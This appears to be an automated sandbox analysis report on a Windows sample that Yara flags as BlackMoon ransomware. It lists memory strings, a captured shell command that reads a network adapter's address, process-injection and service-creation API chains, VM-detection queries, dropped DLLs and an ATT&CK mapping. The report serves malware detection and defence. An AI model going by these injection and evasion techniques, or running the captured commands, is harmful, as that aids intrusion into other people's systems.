                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ip138.comUser-Agent:
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://www.lanzout.com
                    Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://www.lanzout.comRefererMozilla/5.0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.uc.cn/ip
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.wegame.com.cn/api/v1/wegame.platform.game.TicketProxy/GetGameTicket
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 39.103.20.61:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Yara detected BlackMoon Ransomware
                    Source: Yara matchFile source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1734098836319.exe PID: 7472, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPED
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004154F3 CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,0_2_004154F3
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00415BEB CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptGetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,0_2_00415BEB

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00450181 NtQueryInformationProcess,CloseHandle,RtlMoveMemory,0_2_00450181
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00440195 NtQueryVirtualMemory,NtQueryVirtualMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle,0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00409662 GetModuleHandleA,VirtualAlloc,LoadLibraryA,LoadLibraryA,RtlEnterCriticalSection,GetProcessHeap,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlCreateUnicodeStringFromAsciiz,LdrLoadDll,RtlFreeAnsiString,RtlLeaveCriticalSection,VirtualFree,0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00440195 NtQueryVirtualMemory,NtQueryVirtualMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle,0_2_00440195
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0049E07A: DeviceIoControl,0_2_0049E07A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00456EF9 OpenProcess,RtlMoveMemory,GetLastError,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeFile created: C:\Windows\SysWOW64\Dult.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0043A0580_2_0043A058
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_005820B80_2_005820B8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_006524490_2_00652449
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_005004680_2_00500468
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0058262A0_2_0058262A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004D47000_2_004D4700
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_005849840_2_00584984
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004DA9AC0_2_004DA9AC
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00582B9C0_2_00582B9C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00500C680_2_00500C68
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0057D2710_2_0057D271
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0041B45B0_2_0041B45B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0064F6670_2_0064F667
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0057F6260_2_0057F626
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0045D82B0_2_0045D82B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0057BC650_2_0057BC65
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: String function: 00435B70 appears 97 times
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: String function: 0040288D appears 41 times
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: String function: 0043B92A appears 51 times
                    Source: 1734098836319.exe, 00000000.00000002.2953896278.00000000035CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindows.dll" vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindows 7.dll" vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000003.1746048706.0000000003421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1734098836319.exe
                    Source: 1734098836319.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPEDMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 1734098836319.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9975773914319249
                    Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@1/3@1/2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00439A44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,0_2_00439A44
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004B0FEA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,0_2_004B0FEA
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004CC4E0 GetCurrentDirectoryA,GetDiskFreeSpaceExA,0_2_004CC4E0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: OpenSCManagerA,OpenServiceA,ControlService,ControlService,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: OpenSCManagerA,OpenServiceA,ControlService,ControlService,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0049F824
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0040BB11 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,CloseHandle,0_2_0040BB11
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00403A0C CoInitialize,CoInitializeSecurity,CoCreateInstance,SysFreeString,CoSetProxyBlanket,CoUninitialize,0_2_00403A0C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00426519 OpenSCManagerA,OpenServiceA,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\submit[1].jsonJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 1734098836319.exeVirustotal: Detection: 70%
                    Source: 1734098836319.exeReversingLabs: Detection: 76%
                    Source: 1734098836319.exeString found in binary or memory: --command "shell cat /sys/class/net/eth0/address"
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                    Source: Binary string: C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2954098082.0000000010000000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: \InfinityHookPro-main\infinity_hook_pro\x64\Debug\infinity_hook_pro.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \win10 32-64\kmclass32_64_release\kmclass32_64_release\kmclass\x64\Debug\kmclass.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: ).pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Debug\Dultx64_win10_FH.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Win7Debug\MKDriver.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdbk source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2954098082.0000000010014000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004DA1DF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004DA1DF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0057E0FD push ecx; ret 0_2_0057E110
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004DA1B0 push eax; ret 0_2_004DA1DE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0064C34F push eax; ret 0_2_0064C37D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004E4820 push eax; ret 0_2_004E484E
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\1734098836319.exeFile created: C:\Windows\SysWOW64\Dult.dllJump to dropped file
                    Source: C:\Users\user\Desktop\1734098836319.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\1734098836319.exeFile created: C:\Windows\SysWOW64\Dult.dllJump to dropped file
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00426519 OpenSCManagerA,OpenServiceA,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00426519

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
                    Source: C:\Users\user\Desktop\1734098836319.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\1734098836319.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2
                    Source: C:\Users\user\Desktop\1734098836319.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Dult.dllJump to dropped file
                    Source: C:\Users\user\Desktop\1734098836319.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\1734098836319.exeAPI coverage: 8.5 %
                    Source: C:\Users\user\Desktop\1734098836319.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004CF160 FindClose,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,0_2_004CF160
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh#
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)
                    Source: C:\Users\user\Desktop\1734098836319.exeAPI call chain: ExitProcess graph end nodegraph_0-114855
                    Source: C:\Users\user\Desktop\1734098836319.exeAPI call chain: ExitProcess graph end nodegraph_0-114868
                    Source: C:\Users\user\Desktop\1734098836319.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00409662 GetModuleHandleA,VirtualAlloc,LoadLibraryA,LoadLibraryA,RtlEnterCriticalSection,GetProcessHeap,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlCreateUnicodeStringFromAsciiz,LdrLoadDll,RtlFreeAnsiString,RtlLeaveCriticalSection,VirtualFree,0_2_00409662
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004DA1DF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004DA1DF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004500CC mov eax, dword ptr fs:[00000030h]0_2_004500CC
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004760F7 mov ecx, dword ptr fs:[00000030h]0_2_004760F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004743D1 mov eax, dword ptr fs:[00000030h]0_2_004743D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00458BE5 mov ecx, dword ptr fs:[00000030h]0_2_00458BE5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0047EDCD mov eax, dword ptr fs:[00000030h]0_2_0047EDCD
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0043EDA9 mov ecx, dword ptr fs:[00000030h]0_2_0043EDA9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0043CDBB mov edx, dword ptr fs:[00000030h]0_2_0043CDBB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00454E4E mov ecx, dword ptr fs:[00000030h]0_2_00454E4E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0043D15A mov ebx, dword ptr fs:[00000030h]0_2_0043D15A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0047F1C9 mov eax, dword ptr fs:[00000030h]0_2_0047F1C9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004CA140 GetProcessHeap,RtlAllocateHeap,MessageBoxA,0_2_004CA140
                    Source: C:\Users\user\Desktop\1734098836319.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Contains functionality to inject threads in other processes
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004654D1 VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualFreeEx,WriteProcessMemory,CreateRemoteThread,VirtualFreeEx,VirtualFreeEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,VirtualFreeEx,CloseHandle,0_2_004654D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_0057A849 cpuid 0_2_0057A849
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_004DC182 GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_004DC182

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		31
                    Obfuscated Files or Information                    		LSASS Memory14
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		2
                    Windows Service                    		11
                    Access Token Manipulation                    		11
                    Software Packing                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook2
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
